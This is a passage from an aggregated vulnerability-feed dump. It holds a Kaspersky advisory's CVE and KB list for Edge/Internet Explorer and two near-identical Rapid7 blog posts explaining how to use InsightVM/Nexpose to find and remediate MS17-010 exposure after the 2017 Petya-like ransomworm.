\n[CVE-2017-8751](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8751>)7.6High \n[CVE-2017-8649](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8649>)7.6High \n[CVE-2017-8748](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8748>)7.6High \n[CVE-2017-8755](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8755>)7.6High \n[CVE-2017-8737](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8737>)7.6High \n[CVE-2017-8648](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8648>)4.3High \n[CVE-2017-8739](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8739>)4.3High \n[CVE-2017-8735](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8735>)4.3High \n[CVE-2017-8733](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8733>)4.3High\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4038788](<http://support.microsoft.com/kb/4038788>) \n[4038782](<http://support.microsoft.com/kb/4038782>) \n[4038783](<http://support.microsoft.com/kb/4038783>) \n[4038792](<http://support.microsoft.com/kb/4038792>) \n[4038799](<http://support.microsoft.com/kb/4038799>) \n[4038781](<http://support.microsoft.com/kb/4038781>) \n[4038777](<http://support.microsoft.com/kb/4038777>) \n[4036586](<http://support.microsoft.com/kb/4036586>)", "modified": "2019-03-07T00:00:00", "published": "2017-09-12T00:00:00", "id": "KLA11098", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11098", "title": "\r KLA11098Multiple vulnerabilities in Microsoft Edge and Microsoft Internet Explorer ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "rapid7community": [{"lastseen": "2017-08-03T17:21:32", "bulletinFamily": "blog", "description": "<!-- [DocumentBodyStart:880a7067-953c-4d86-bb9f-22e02d26586e] --><div class=\"jive-rendered-content\"><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">A Petya-like ransomworm struck on 
June 27th 2017 and spread throughout the day, affecting organizations in several European countries and the US. It is believed that the ransomworm achieved its initial infection via a compromised software update, and that it then leverages the </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Fsmb%2Fms17_010_eternalblue\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">EternalBlue </span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">and </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fdoublepulsar%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">DoublePulsar </span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">exploits to spread laterally. Once in place, it takes control of a system and encrypts files. 
As a reminder, EternalBlue was leveraged for </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">WannaCry</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> as well, so we cannot stress enough the importance of patching against MS17-010 vulnerabilities</span><span style=\"font-size: 11pt; font-family: Arial; color: #ff0000;\">.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For the latest updates on this ransomworm, please see Rapid7’s </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fpetya%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">recommended actions</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">To help customers understand their risk, we are sharing steps to create a targeted scan, dynamic asset group, and remediation project for identifying and fixing vulnerabilities; we will update as more information becomes available on other CVEs that may be used to spread the worm. 
As always, you can contact Rapid7 Support and your CSM with any questions, and if you haven’t done so already, </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">download a trial of InsightVM here</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">.</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Scan Template</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">The step-by-step guide to create an InsightVM/Nexpose scan template specifically to look for MS17-010 </span><span style=\"font-size: 11pt; font-family: Arial; color: #212121;\">is as follows:</span></p><p style=\"padding-left: 30px;\"><span style=\"font-size: 11pt; font-family: Arial; color: #212121;\">1.  Under the Administration tab, go to Templates > Manage Templates</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\"> </p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67241/Admin-ManageTemplates.gif\"><img alt=\"Admin-ManageTemplates.gif\" class=\"image-1 jive-image\" height=\"687\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67241/Admin-ManageTemplates.gif\" style=\"width: 620px; height: 298px;\" width=\"1430\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\"> </p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\"> </p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\">2. Copy the following template: Full Audit without Web Spider. 
Don't forget to give your copy a name and description.</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\"> </p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67242/Admin-CopyScantemplate.gif\"><img alt=\"Admin-CopyScantemplate.gif\" class=\"image-2 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67242/Admin-CopyScantemplate.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\"> </p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\">3. First uncheck \"Policies\". Click on Vulnerability Checks and then \"By Individual Checks\"</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\"> </p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67243/Admin-ByIndividualCheck.gif\"><img alt=\"Admin-ByIndividualCheck.gif\" class=\"image-3 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67243/Admin-ByIndividualCheck.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\"> </p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\">4. 
<span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Add Check “</span><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">MS17-010</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">” and click Save:</span></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\"> </p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-size: 11pt; font-family: Arial;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67244/Scantemplate-ms17-010.gif\"><img alt=\"Scantemplate-ms17-010.gif\" class=\"image-4 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67244/Scantemplate-ms17-010.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\"> </p><p dir=\"ltr\" style=\"padding-left: 30px;\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">This should return checks that are related to MS17-010. 
The related CVEs are:</span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0143</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0144</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0145</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0146</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0147</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" 
rel=\"nofollow\" target=\"_blank\">CVE-2017-0148</a></span></p><p style=\"padding-left: 30px;\">5. <span style=\"color: #000000; font-size: 11pt; font-family: Arial;\">Save the template and run a scan to identify all assets with MS17-010.</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\"> </p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Dynamic Asset Group</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">Now that you have scanned your assets, you may want to create a Dynamic Asset Group for reporting and tagging, which will update whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the </span><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">InsightVM</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\"> console, just under the search button:</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67245/Screen+Shot+2017-06-27+at+3.55.40+PM.png\"><img alt=\"Screen Shot 2017-06-27 at 3.55.40 PM.png\" class=\"image-5 jive-image\" height=\"160\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67245/Screen+Shot+2017-06-27+at+3.55.40+PM.png\" style=\"width: auto; height: auto;\" width=\"620\"/></a></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, use the \"CVE ID\" filter to specify the CVEs listed below:</span></p><p><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67246/Screen+Shot+2017-06-27+at+3.42.28+PM.png\"><img alt=\"Screen Shot 
2017-06-27 at 3.42.28 PM.png\" class=\"image-6 jive-image\" height=\"457\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67246/Screen+Shot+2017-06-27+at+3.42.28+PM.png\" style=\"width: 620px; height: 385px;\" width=\"736\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">This asset group can now be used for reporting as well as tagging to quickly identify exposed systems.</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Dashboard</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">Rapid7 will add a pre-built dashboard for the Petya-like ransomworm, like we did with the recent WannaCry and Samba vulnerabilities.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">Also, check out the new </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7908\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/06/13/live-threat-driven-prioritization\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">Threat Feed dashboard</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\"> which contains a view of your assets that are affected by actively targeted vulnerabilities including those leveraged by this ransomworm.</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">If you want to build your own, </span><span style=\"font-size: 11pt; font-family: Arial; color: #303030;\">here’s </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" 
href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">how you can build a custom dashboard</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #303030;\">, with examples taken from the Shadow Brokers leak.  To find your exposure to MS17-010 vulnerabilities, you could use this Dashboard filter:</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p><span style=\"background-color: #f6f6f6; color: #000000; font-family: 'courier new', courier; font-size: 12pt;\">asset.vulnerability.alternateIds <=> ( altId = \"MS17-010\" )<br/></span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a SQL Query Export</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">@00jay kindly posted this handy discussion for details on using the SQL export in InsightVM/Nexpose: </span><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\"><a class=\"jive-link-thread-small\" data-containerId=\"2004\" data-containerType=\"14\" data-objectId=\"9963\" data-objectType=\"1\" href=\"https://community.rapid7.com/thread/9963\">WannaCry - Scanning & Reporting.</a></span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Remediation Project</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">In InsightVM, you can also create a remediation project to track the progress of remediation. 
To do this, go to the “Projects” tab and click “Create a Project”:</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #231f20;\"><a href=\"https://lh5.googleusercontent.com/vT0bpOOFI8vB3q3V9gw8-6F5W9nDDjQSwCiYeai89avr0DFI0a7gbl0RLnuxHfrOJ7dA6U4zd1bV4zaEdA3WHeVD-F5C8E_Ok75WKrdvhHWqG3v-yzBxQVCIk6ZrcUCRgZ_jOHC9\"><img class=\"jive-image\" height=\"144\" src=\"https://lh5.googleusercontent.com/vT0bpOOFI8vB3q3V9gw8-6F5W9nDDjQSwCiYeai89avr0DFI0a7gbl0RLnuxHfrOJ7dA6U4zd1bV4zaEdA3WHeVD-F5C8E_Ok75WKrdvhHWqG3v-yzBxQVCIk6ZrcUCRgZ_jOHC9\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Give the project a name, and under vulnerability filter type in <span style=\"font-family: 'courier new', courier;\">vulnerability.alternateIds.altId CONTAINS \"MS17-010\"</span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh5.googleusercontent.com/EKYc9oj7OfPlbI3V-CxqCdTrnBcrr3fyVQHq_vbi2ba2nN5g-lMp_vSoZGp9tDByRKlVgVuRKXn2-h1ZaJUiiRZHm2y4-JlBItYYUiKqIUuv8FwSuZy1tlF89xpX8lChUuJQPGKd\"><img class=\"jive-image\" height=\"248\" src=\"https://lh5.googleusercontent.com/EKYc9oj7OfPlbI3V-CxqCdTrnBcrr3fyVQHq_vbi2ba2nN5g-lMp_vSoZGp9tDByRKlVgVuRKXn2-h1ZaJUiiRZHm2y4-JlBItYYUiKqIUuv8FwSuZy1tlF89xpX8lChUuJQPGKd\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability.</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 
11pt; font-family: Arial; color: #000000;\">Now, you can give this project a description, and configure who is responsible for remediation, as well as access levels if you wish. If you have </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7839\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/08/simple-remediation-collaboration\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">JIRA or ServiceNow</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">, you can also configure the automatic ticketing integration between InsightVM and JIRA/ServiceNow to automatically assign tickets to the right folks.</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Using these steps, you’ll be able to quickly scan for some of the vulnerabilities leveraged by this ransomworm. 
If you have any questions please don’t hesitate to let us know!</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For more information and resources on this ransomworm, </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fdoublepulsar\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">please visit this page</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">.</span></p></div><!-- [DocumentBodyEnd:880a7067-953c-4d86-bb9f-22e02d26586e] -->", "modified": "2017-08-03T16:56:04", "published": "2017-08-03T16:56:04", "href": "https://community.rapid7.com/community/nexpose/blog/2017/06/28/petya-like-ransomworm-leveraging-insightvm-and-nexpose-for-visibility-into-ms17-010", "id": "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "title": "Petya-like ransomworm: Leveraging InsightVM and Nexpose for visibility into MS17-010", "type": "rapid7community", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-06-28T03:17:01", "bulletinFamily": "blog", "description": "<!-- [DocumentBodyStart:736fb2f2-6580-4bdc-908e-ca4c7c801548] --><div class=\"jive-rendered-content\"><p dir=\"ltr\"><span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">A Petya-like ransomworm struck on June 27th 2017 and spread throughout the day, affecting organizations in several european countries and the US. 
It is believed that the ransomworm may achieve its initial infection via a malicious document attached to a phishing email, and then leverages the </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Fsmb%2Fms17_010_eternalblue\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">EternalBlue </span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">and </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fdoublepulsar%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">DoublePulsar </span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">exploits to spread laterally. Once in place, it takes control of a system and encrypts files. As a reminder, EternalBlue was leveraged for </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">WannaCry</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> as well, so we cannot stress enough the importance of patching against MS17-010 vulnerabilities</span><span style=\"font-size: 11pt; font-family: Arial; color: #ff0000;\">. 
</span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For the latest updates on this ransomworm, please see Rapid7’s </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fpetya%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">recommended actions</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">.</span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">To help customers understand their risk, we are sharing steps to create a targeted scan, dynamic asset group, and remediation project for identifying and fixing vulnerabilities; we will update as more information becomes available on other CVEs that may be used to spread the worm. 
As always, you can contact Rapid7 Support and your CSM with any questions, and if you haven’t done so already, </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">download a trial of InsightVM here</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">.</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Scan Template</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">The step-by-step guide to create an InsightVM/Nexpose scan template specifically to look for MS17-010 </span><span style=\"font-size: 11pt; font-family: Arial; color: #212121;\">is as follows:</span></p><p style=\"padding-left: 30px;\"><span style=\"font-size: 11pt; font-family: Arial; color: #212121;\">1.  Under the Administration tab, go to Templates > Manage Templates</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\"> </p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7924-67229/Admin-ManageTemplates.gif\"><img alt=\"Admin-ManageTemplates.gif\" class=\"image-1 jive-image\" height=\"687\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7924-67229/Admin-ManageTemplates.gif\" style=\"width: 620px; height: 298px;\" width=\"1430\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\"> </p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\"> </p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\">2. Copy the following template: Full Audit without Web Spider. 
Don't forget to give your copy a name and description.</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\"> </p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7924-67230/Admin-CopyScantemplate.gif\"><img alt=\"Admin-CopyScantemplate.gif\" class=\"image-2 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7924-67230/Admin-CopyScantemplate.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\"> </p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\">3. First uncheck \"Policies\". Click on Vulnerability Checks and then \"By Individual Checks\"</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\"> </p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7924-67231/Admin-ByIndividualCheck.gif\"><img alt=\"Admin-ByIndividualCheck.gif\" class=\"image-3 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7924-67231/Admin-ByIndividualCheck.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\"> </p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\">4. 
<span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Add Check “</span><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">MS17-010</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">” and click Save:</span></span></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\"> </p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-size: 11pt; font-family: Arial;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7924-67232/Scantemplate-ms17-010.gif\"><img alt=\"Scantemplate-ms17-010.gif\" class=\"image-4 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7924-67232/Scantemplate-ms17-010.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\"> </p><p dir=\"ltr\" style=\"padding-left: 30px;\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">This should return checks that are related to MS17-010. 
The related CVEs are:</span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0143</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0144</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0145</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" 